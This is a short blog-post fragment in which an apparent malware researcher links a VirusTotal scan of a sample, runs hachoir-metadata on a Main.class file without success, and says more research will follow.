    http://www.virustotal.com/analisis/d0bfb359d71b2f80b7e0539a9682b6884a5c2a5c8dd209ce4b72e79295ef90c1-1267136274
    But there’s something kinda weird about it…
    $ hachoir-metadata Main.class
    [err!] [] Hachoir can’t extract metadata, but is able to parse: Main.class
    Anyway, I’ll do some more research on it.

Comments are closed.